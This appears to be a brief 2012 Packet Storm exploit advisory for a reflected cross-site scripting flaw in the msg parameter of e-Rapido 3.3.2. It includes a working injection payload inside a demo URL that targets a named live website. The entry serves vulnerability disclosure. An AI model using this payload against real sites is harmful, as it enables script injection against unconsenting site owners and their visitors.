e-Rapido 3.3.2 Cross Site Scripting

2012-03-13T00:00:00
ID PACKETSTORM:110756
Type packetstorm
Reporter l20ot
Modified 2012-03-13T00:00:00

Description

                                        
                                            `# Exploit Title: e-Rapido v3.3.2 Cross Site Scripting  
# Date: 13.03.2012  
# Author: l20ot  
# Web Browser : Mozilla Firefox  
# Blog : http://www.twitter.com/l20ot  
------------------------------------------------------  
  
msg Parameter is vulerable to XSS!  
Demo: http://www.armazemdosfiltros.com.br/erapido/index.php?msg=");prompt(2);alert("  
`